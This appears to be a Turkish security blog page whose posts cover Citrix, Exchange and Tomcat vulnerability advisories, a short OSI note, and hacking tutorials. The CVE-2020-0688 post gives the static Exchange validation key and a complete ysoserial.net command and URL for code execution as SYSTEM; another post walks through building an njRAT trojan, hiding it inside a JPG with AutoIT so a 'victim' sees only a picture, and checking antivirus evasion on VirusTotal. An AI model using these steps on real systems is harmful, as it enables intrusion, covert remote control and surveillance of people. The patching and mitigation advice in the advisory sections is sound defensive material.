9 Mart 2020 Pazartesi

Citrix ADC ve Unified Gateway üzerinde kritik bir güvenlik açığı keşfedildi



Genel Bilgi

Citrix ADC ve Unified Gateway üzerinde kritik bir güvenlik açığı keşfedildi.
Citrix ADC (Application Delivery Controller), uygulamaların performansını hızlandıran, 4. ve 7. katman yük dengeleme özelliği ile uygulama kullanılabilirliğini artıran, kritik uygulamaları saldırılara karşı koruyan ve hesaplama açısından yoğun olan işlemleri düşürerek sunucu giderlerini azaltan bir uygulama denetleyicisidir.
Unified Gateway ise bu uygulamaların çalıştığı sunucuların yerel ağlarına uzaktan erişim sağlamaktadır.

Zafiyetten etkilenen sürümler:

Citrix ADC and Citrix Gateway version 13.0 all supported builds
Citrix ADC and NetScaler Gateway version 12.1 all supported builds
Citrix ADC and NetScaler Gateway version 12.0 all supported builds
Citrix ADC and NetScaler Gateway version 11.1 all supported builds
Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

Etki
Güvenlik açığı Citrix ADC ve Unified Gateway yazılımları üzerinde rastgele kod çalıştırmalarına olanak vermektedir. Bu güvenlik açığından başarıyla yararlanılması, kimliği doğrulanmamış bir saldırganın şirket içi uygulamalara erişmesine izin vermektedir. CVE-2019-19781

Çözüm
Citrix herhangi bir düzeltme yayınlamamıştır. Düzeltmeler yapılana kadar zafiyetin etkisini azaltmak için konfigürasyon ve yazılım güncellenmesi yapılması gerekmektedir.  https://support.citrix.com/article/CTX267679

Kaynaklar


 






Share:

CVE-2020-0688: SABİT KRİPTOGRAFİK TUŞLAR İLE MICROSOFT EXCHANGE SERVER’DA UZAKTAN KOD YÜRÜTME

Microsoft, Microsoft Exchange Server'daki bir uzaktan kod yürütme hatasını gidermek için bir düzeltme eki yayınladı.
Microsoft, bu hatanın bir bellek bozulması güvenlik açığı nedeniyle olduğunu ve güvenlik açığı bulunan bir Exchange sunucusuna gönderilen özel hazırlanmış bir e-posta tarafından kullanılabileceğini belirtti. Bunun nedeni, neredeyse tüm kullanıcıların bir Exchange posta kutusu olması ve sınırlı ayrıcalıklara sahip olmalarına rağmen sunucuda kimlik doğrulaması yapabilmesidir. Bu, hiçbir şekilde bir saldırgan için bir engel değildir, çünkü kimlik doğrulama bu güvenlik açığından başarıyla yararlanmak için tek gereksinimdir.Bu kusurdan yararlanmak için saldırganların yalnızca internetten erişilebilen savunmasız sunucular bulmaları, Outlook Web Access (OWA) portal URL'sinden topladıkları e-posta adreslerini aramaları ve veri ihlallerinden ilgili dökümleri almaları gerekir. Daha sonra, sadece bir kimlik bilgisi doldurma saldırısı başlatmalı ve isabet alana ve sunucuya giriş yapana kadar buna devam etmelidirler.
Güvenlik açığı, Exchange Server'ın kurulum sırasında unique kriptografik anahtarlar oluşturamaması nedeniyle ortaya çıkar. Özellikle, hata Exchange Control Panel (ECP) bileşeninde bulunur. Kurulum  başında rasgele oluşturulan anahtarlar yerine, Microsoft Exchange Server’ın tüm yüklemeleri web.config dosyasında aynı validationKey ve decryptionKey değerlerine sahiptir. Bu anahtarlar ViewState için güvenlik sağlamak için kullanılır. ViewState, ASP.NET web uygulamalarının istemcide serileştirilmiş biçimde sakladığı sunucu tarafı verilerdir. İstemci, bu verileri __VIEWSTATE istek parametresi aracılığıyla sunucuya geri sağlar.Statik anahtarların kullanılması nedeniyle, saldırgan sunucuyu kötü niyetle hazırlanmış ViewState verilerinin serisini kaldırması için kandırabilir. YSoSerial.net'in yardımıyla bir saldırgan, Exchange Control Panel web uygulaması bağlamında sunucuda rasgele .NET kodu çalıştırabilir ve SYSTEM olarak çalışır.
Bu güvenlik açığından yararlanmak için, kimliği doğrulanmış bir oturumdan ViewStateUserKey ve __VIEWSTATEGENERATOR değerlerini toplamamız gerekir. ViewStateUserKey, ASP.NET _SessionID çerezinden alınırken, ViewStateUserKey gizli bir alanda bulunabilir. Tüm bunlar tarayıcıdaki standart geliştirici araçları kullanılarak kolayca elde edilebilir.
Başlamak için /ecp/default.aspx sayfasına gidin ve giriş yapın. Kullanılan hesabın herhangi bir özel ayrıcalığa sahip olması gerekmez. Bu örnekte, user adlı bir hesap kullanılmaktadır:

Devam etmek için bazı bilgiler toplamamız gerekiyor. En değerli kısım zaten bilinmektedir:
validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
validationalg = SHA1
ViewStateUserKey ve __VIEWSTATEGENERATOR'u elde etmek için Geliştirici Araçları'nın (F12) Ağ sekmesini açın ve F5 tuşuna basarak isteği yeniden gönderin. Giriş yaparken /ecp/default.aspx isteğinin yanıtına ihtiyacımız vardır:

Gördüğünüz gibi, __VIEWSTATEGENERATOR değeri sayfa kaynağında görülebilir. Bu örnekte, değeri B97B4E27'dir. Büyük olasılıkla, değeriniz aynı olacaktır. Ardından, Başlıklar sekmesini açın ve İstek başlıklarında ASP.NET_SessionId cookie sini bulunuz:

Bu örnekte, değeri 05ae4b41-51e1-4c3a-9241-6b87b169d663'tür.
Artık bir saldırı gerçekleştirmek için gereken tüm bilgilere sahibiz:
         --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
         --validationalg = SHA1
         - generator = B97B4E27
         --viewstateuserkey = 05ae4b41-51e1-4c3a-9241-6b87b169d663
Bir sonraki adım, ysoserial.net kullanarak bir ViewState payloadu oluşturmaktır. C: \ Vuln_Server.txt dosyasını oluşturarak kod çalıştırılmasını sağlayan bir payload oluştururuz:
      ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/Vuln_Server.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy



Son olarak, ViewState payloadunu URL-encoded olarak aşağıdaki gibi bir URL oluşturmamız gerekir:
/ecp/default.aspx? __ VIEWSTATEGENERATOR = <jeneratör> & __ viewstate = <ViewState>
yukarıda elde edilen generator ve URL-encoded ViewState'in yerine kullanılır.
Daha sonra, ortaya çıkan URL'i tarayıcıya yapıştırıp Exchange sunucusuna göndeririz:

Sunucu 500 Unexpected Error veriyor, ancak saldırı başarılı. Hedef sunucu üzerindeki etkinin incelenmesi:


Vuln_Server.txt dosyası şuan mevcuttur. Dosyadaki sahiplik bilgilerinin incelendiğinde bir SYSTEM belirteci olan bir işlem tarafından oluşturulduğunu onaylar.


Bu, bir saldırganın SYSTEM olarak rasgele kod yürütebildiğini ve hedef Exchange sunucusunu tamamen tehlikeye atabildiğini gösterir.
ETKİLENEN SİSTEMLER
Desteklenen tüm Microsoft Exchange Server sürümleri için güvenlik güncelleştirmelerini aşağıdaki linklerden indirebilirsiniz:
Microsoft Exchange Server 2010 SP3 Update Rollup 30 ->https://www.microsoft.com/en-us/download/details.aspx?id=100910
Microsoft Exchange Server 2013 Cumulative Update 23 ->https://www.microsoft.com/en-us/download/details.aspx?id=100909
Microsoft Exchange Server 2016 Cumulative Update 14->https://www.microsoft.com/en-us/download/details.aspx?id=100907
Microsoft Exchange Server 2016 Cumulative Update 15 ->https://www.microsoft.com/en-us/download/details.aspx?id=100908
Microsoft Exchange Server 2019 Cumulative Update 3 ->https://www.microsoft.com/en-us/download/details.aspx?id=100905
Microsoft Exchange Server 2019 Cumulative Update 4 ->https://www.microsoft.com/en-us/download/details.aspx?id=100906


ÇÖZÜM ÖNERİLERİ
Tüm yazılımları, minimum erişim haklarına sahip, ayrıcalıklı olmayan bir kullanıcı olarak çalıştırın. Gizli güvenlik açıklarının etkisini azaltmak için, yönetici olmayan yazılımları her zaman en az erişim haklarına sahip bir kullanıcı olarak çalıştırın.
Ağ trafiğini kötü amaçlı etkinliklere karşı izlemek için Network Intrusion Detection System(NIDS) kullanın. Bu, başarılı istismarlardan kaynaklanan istismar girişimlerini veya faaliyetlerini gösterebilir.
Bilinmeyen veya güvenilmeyen kaynaklar tarafından sağlanan bağlantılara gitmeyin.Web kullanıcıları, yabancı veya şüpheli kaynaklar tarafından sağlanan sitelere olan bağlantılara gitme konusunda dikkatli olmalıdır. HTML'yi e-postalardan filtrelemek, kullanıcılara kötü amaçlı bağlantılar iletmek için olası bir vektörün kaldırılmasına yardımcı olabilir.
Birden fazla güvenlik katmanı uygulayın. Memory-protection schemes (gerçekleştirilemeyen yığın, yığın yapılandırmaları ve rastgele eşlenen bellek segmentleri gibi), bellek bozulması güvenlik açıklarından yararlanılmasını zorlaştırır.
Güncellemeler yapınız.

SONUÇ
Microsoft bu güvenlik açığını Şubat 2020'de CVE-2020-0688 olarak ekledi. Bu güvenlik açığını “Microsoft Exchange'in kurulum sırasında anahtarları nasıl oluşturduğunu düzelterek” giderdiler. Artık yükleme sırasında kriptografik anahtarları rastgele seçmektedir. Microsoft, büyük olasılıkla bir saldırganın önce kimlik doğrulaması yapması gerektiği için bunu önem derecesi olarak değerlendirdi.
Bir kuruluş içerisinde çoğu kullanıcının Exchange sunucusunda kimlik doğrulaması yapmasına izin verilir. Herhangi bir kurumsal kullanıcının cihazını veya kimlik bilgilerini tehlikeye atan bir saldırgan, Exchange sunucusunu ele geçirmeye devam edebilir. Bunu başardıktan sonra, saldırgan kurumsal e-posta iletişimini istediği gibi açığa vurabilir veya farklı bir şekilde konumlandırabilir.
Buna göre, bir Exchange Server yöneticisiyseniz, bunu kritik olarak derecelendirilmiş bir yama olarak değerlendirmeli ve gerekli önlemleri almalısınız.
Microsoft bunu 1 Exploit Dizini ile listeler ve bu yama yayınından sonraki 30 gün içinde istismar görmeyi bekledikleri anlamına gelir.

REFERANSLAR
4) https://us.norton.com/online-threats/microsoftexchangecve-2020-0688remotememorycorruptionvul-111753-vulnerability.html



Share:

GhostCat: Yeni Yüksek Riskli Güvenlik Açığı Apache Tomcat Çalışan Sunucuları Etkiliyor !


GhostCat: Yeni Yüksek Riskli Güvenlik Açığı Apache Tomcat Çalışan Sunucuları Etkiliyor

 Apache Tomcat'in tüm sürümleri (9.x / 8.x / 7.x / 6.x) yeni bir kritik zaafiyet ortaya çıktı. Web sunucunuz Apache Tomcat üzerinde çalışıyorsa, saldırganların sunucu üzerinde yetkisiz bir şekilde kontrolü eline almasını önlemek için sunucu uygulamasının en son sürümünü hemen yüklemelisiniz. Ayrıca internette bu istismarın yer almasıyla herkesin erişebileceği savunmasız web sunucularını hacklemesini kolaylaştırdı. 'Ghostcat' olarak adlandırılan ve CVE-2020-1938 olarak geçen istismar, kimliği doğrulanmamış saldırganların savunmasız bir web sunucusundaki herhangi bir dosyanın içeriğini okumasına ve hassas yapılandırma dosyaları veya kaynak kodu almasına, sunucu dosyaya izin veriyorsa rastgele kod yürütmesine izin verebilir.
Güvenlik açığı, bir özelliğin yanlış işlenmesi nedeniyle ortaya çıkan Apache Tomcat yazılımının AJP protokolünde yatmaktadır. Site, kullanıcıların dosya yüklemesine izin veriyorsa, saldırgan önce sunucuya kötü amaçlı JSP komut dosyası kodu içeren bir dosya yükleyebilir (yüklenen dosya resim, düz metin dosyaları vb. herhangi bir dosya türünde olabilir) ve ardından yüklenen dosya ile uzaktan kod yürütülmesine neden olabilecek Ghostcat'ten yararlanılır. Apache JServ Protokolü (AJP) protokolü, Tomcat'in bir Apache web sunucusuyla iletişim kurmasını sağlamak için temel olarak HTTP protokolünün optimize edilmiş bir sürümüdür.
AJP protokolü varsayılan olarak etkinleştirilmiş ve TCP bağlantı noktası 8009'da dinlese de, 0.0.0.0 IP adresine bağlıdır ve ancak güvenilmeyen istemciler tarafından erişilebilir olduğunda istismar edilebilir. Açık kaynaklı ve siber tehdit istihbarat verileri için bir arama motoru olan 'onyphe' e göre, bir AJP Bağlayıcısı'nı yazma sırasında internet üzerinden herkese açık hale getiren 170.000'den fazla cihaz var.
Exploite ait kaynak kodu: https://www.exploit-db.com/exploits/48143
Etkilenen Sürümler
·       Apache Tomcat 9.x <9.0.31
·       Apache Tomcat 8.x <8.5.51
·       Apache Tomcat 7.x <7.0.100
·       Apache Tomcat 6.x

Apache Tomcat bu güvenlik açığını gidermek için 9.0.31, 8.5.51 ve 7.0.100 sürümleri yayınlandı.

Güvenlik açığını gidermek veya en aza indirmek için yapılacak birkaç adım aşağıdaki gibidir:
 Bu güvenlik açığını doğru bir şekilde gidermek için, önce Tomcat AJP Connector hizmetinin sunucu ortamınızda kullanılıp kullanılmadığını belirlemeniz gerekir. Eğer cluster veya reverse proxy kullanılmıyorsa, AJP’nin kullanılmadığını anlayabilirsiniz.  Aksi takdirde, cluster veya reverse sunucunun Tomcat AJP connector hizmetiyle iletişim kurup kurmadığını tespit etmeniz gerekli.


1. AJP Bağlayıcı hizmeti kullanılmıyorsa:

(1) <CATALINA_BASE> /conf/server.xml aşağıdaki satırı düzenleyin

<Connector port=”8009″ protocol=”AJP/1.3″ redirectPort=”8443″ />

(2) Yorum satırı hale getirin (veya silin):

<!–<Connector port=”8009″ protocol=”AJP/1.3″ redirectPort=”8443″ />–>

(3) Düzenlemeyi kaydedin ve ardından Tomcat’i yeniden başlatın.

Yukarıdaki önlemlere ek olarak, güvenilmeyen kaynakların Tomcat AJP Connector hizmet portuna erişmesini önlemek için firewallda da gerekli erişim izinlerini düzenleyiniz.

2- AJP Connector hizmeti kullanılıyorsa:

AJP Connector hizmeti kullanılıyorsa, Tomcat’i 9.0.31, 8.5.51 veya 7.0.100 sürümüne yükseltmenizi ve ardından AJP Connector kimlik doğrulama bilgilerini ayarlamak için AJP Connector için “scret” özelliğini yapılandırmanız öneriliyor.

<Connector port=”8009″ protocol=”AJP/1.3″ redirectPort=”8443″ address=”YOUR_TOMCAT_IP_ADDRESS” secret=”YOUR_TOMCAT_AJP_SECRET” />

Yükseltme yapamıyorsanız, AJP Bağlayıcısı için AJP protokolü kimlik doğrulama bilgilerini ayarlamak üzere “requiredSecret” özniteliğini yapılandırabilirsiniz.

<Connector port=”8009″ protocol=”AJP/1.3″ redirectPort=”8443″ address=”YOUR_TOMCAT_IP_ADDRESS” requiredSecret=”YOUR_TOMCAT_AJP_SECRET” />

(Yukarıdaki “YOUR_TOMCAT_AJP_SECRET” i kolayca tahmin edilemeyen veya kırılamayan daha güvenli bir şifre ile değiştirmeyi unutmayınız.)
Çözüm Önerisi
·       Bu istismarı önlemek için Apache Tomcat'i en son sürümüne güncellemek önerilmektedir.En son sürümler ayrıca diğer 2 düşük önem düzeyli HTTP request smuggling sorununu (CVE-2020-1935 ve CVE-2019-17569) giderir.
·       Web yöneticilerinin yazılım güncellemelerini mümkün olan en kısa zamanda uygulaması önemle tavsiye edilir ve güvenli olmayan kanal üzerinden iletişim kurduğu ve güvenilir bir ağda kullanılması gerektiği için AJP bağlantı noktasını güvenilmeyen istemcilere asla göstermemeleri önerilir.
·       Bununla birlikte, herhangi bir nedenle etkilenen web sunucunuzu hemen yükseltemezseniz, AJP Bağlayıcısı'nı doğrudan devre dışı bırakabilir veya dinleme adresini localhost olarak değiştirebilirsiniz.
·       AJP kullanmıyorsanız, server.xml dosyasındaki 8009 numaralı bağlantı noktasında AJP bağlantısını devre dışı bırakın. AJP'nin gelecekte yanlışlıkla yeniden etkinleştirilmesi durumunda bağlantı noktasına harici erişimi engellenmelidir.
·       AJP kullanıyorsanız, yamalanmış AJP koduyla Tomcat sürümünüzü yeni güncellenen sürümlerle güncelleyin.
·       Yalnızca güvenilir ana bilgisayarlardan AJP bağlantılarına izin veren firewall kuralları belirleyin.


Referanslar



Share:

13 Şubat 2019 Çarşamba

OSİ REFERANS MODELİ VE TCP/IP PROTOKOLÜ HAKKINDA HİÇ BİLMEDİKLERİMİZ

  Bunca yıldır her yerde karşımıza çıkan ve anlatılan Osi Referans Modelinin aslında hiç kullanılmadığını biliyor muydunuz?

 Gazi CyberIO hacker kampının ilk gününde sınıfça ağzımızı açık bırakan bir konuya değinmek istiyorum.Osi Referans Modelinin çok keskin hatlardan oluştuğu için sadece bir referans modeli olarak hayatımıza girip hiç kullanılmamış olması...Onun yerine geliştirilen TCP/IP protokolünü geçmişten bu yana hala kullanıyoruz.

İkisinin de ortak katmanları olmakla beraber Osi Referans Modeli 7 katmandan, TCP/IP protokolü 4 katmandan oluşuyor. 


Share:

5 Şubat 2019 Salı

OLUŞTURDUĞUMUZ ZARARLI DOSYALARIN HANGİ ANTİVİRÜSLERE YAKALANACAĞINI GÖRME

  Bir önceki yayında oluşturduğum test.exe zararlı dosyasının hedef sistemdeki hangi antivirüslere yakalanıp yakalanmayacağını tespit edelim.

Bunun için ben  https://www.virustotal.com/tr/  sitesini kullanacağım.Siteyi açtıktan sonra dosyamızı yükleyip tara diyoruz.

Tarama sonuçlarında kırmızı çarpı olanlar dosyamızın yakalanacağı antivirüs programlarını temsil eder.Yeşil tik ise yakalanmayacağını temsil eder.







Buradan da görüldüğü üzere çoğu antivirüs programına yakalanmayacağını anlıyoruz test.exe dosyamızın..
Share:

BİR ZARARLI EXE KODUNU JPG İLE BİRLEŞTİRİP GİZLEME

  Bu uygulamayı yaparken 2 tane program kullanacağım.Bunlardan biri njRAT diğeri de autoIT.
Öncelikle .exe uzantılı dosyamı oluşturmak için njRAT programına gidip aşağıdaki işlemleri yapacağım.Çok önemli olarak bahsetmem gerekirse antivirüs programlarınızı devre dışı bırakmanızdır.Aksi takdirde program dosyalarınızı tehdit olarak algılayıp silecektir.

Port kısmını 3460 seçip start diyoruz.

Daha sonra..


  Aşağıdaki Builder kısmına tıkladıktan sonra üstteki pencere geliyor önümüze.Hostumuz local host olarak kalsın.VicTim Name yani kurbanın adına ben KURBAN dedim siz istediğinizi yazabilirsiniz. exe dosyasının bir iconu olsun isterseniz Icon kutucuğunu işaretleyip icon ekleyebilirsiniz, ben şimdilik eklemedim.Temp dosyası içerisinde işlem yapacağımız için o kısmın seçili olması lazım ki seçili geliyor.Bütün işlemler bittikten sonra Build diyip exe dosyasını kaydediyoruz.Fakat burada unutulmaması gereken bir şey var o da oluşturduğum bütün dosyalar aynı yerde olmalı aynı dosya altında mesela.njRAT programımız bir köşede dursun bunu kapatmayın çünkü daha sonra oradan bir çıktı alacağız.
 Şimdilik buradaki işim bitti fakat exe dosyasında arka planda zararlı içerik çalıştıracağım ve bu exe dosyasının dikkat çekmemesi için bir jpg ile ekleme yapıcam. Yani exe dosyasını hedef çalıştırdığında sadece resmi görecek.Bunun için bir herhangi bir jpg dosyasını seçebilirsiniz.
 Bu adımda autoIT programına gidip resim ve exe'yi birleştireceğim.Bunun için aşağıdaki adımları
uygulamanız yeterli olacaktır.Ben jpg dosyasının adına selam koydum, exe dosyasının adını da selam koydum.


Burada exe ve ile jpg dosyalarımı birleştiriyoruz.Bunu kaydedip çıkıyoruz daha sonrasında kaydet farklı kaydet diyip adını istediğiniz gibi koyabilirsiniz ben test koydum.


Sonra oluşan bu dosyaya sağ tık compile script(x64) dediyoruz.Bu yazılımı kendi bilgisayarımızda deneyeceğimiz için size uygun olan işletim sistemine göre compile edin.

Burada dikkat edilmesi önemli bir nokra ise oluşturduğunuz her şeyi aynı dosya altında barındırmak aksi taktirde hata verecektir.
Aşağıdaki gibi olsun örneğin:


Sonrasında asıl exe dosyamız autoIT sonrası elde ettiğimiz test.exe olduğu için onu bir çalıştırmayı deneyelim.


Benden size selam olsun :))  Sonuç olarak arkada zararlı bir kod çalıştırırken hedef bilgisayar, şuan için kendi bilgisayarımızda denedik, çıktıda sadece bu resmi görecek.
Ayrıca text.exe çalıştırdığımızda njRAT programına şöyle bir çıktı gelecektir:


Kurbanın bilgisayarını erişimi sağladık.Bağlantıyı sonlandırmak için.mavi yere gelip sağ tık yapıyoruz.Oradadan da server-->uninstall dedikten sonra bağlantı son buluyor.Bir sonraki yayında bu erişimi sağladıktan sonra neler yapabiliriz ona bakacağız.Bir sonraki yayında görüşmek üzere....!
Share:

Microsoft Exchange Server 2019, 2016 ve 2013 için Güvenlik Güncellemesi

Microsoft Exchange Server’da yeni çıkan zafiyetlere karşı Microsoft yamalar yayınlamıştır. CVE-2021-31195 (Code injection) : Güvenlik açı...

Bu Blogda Ara

Blog Arşivi

Yorumlar

Popülar Postlar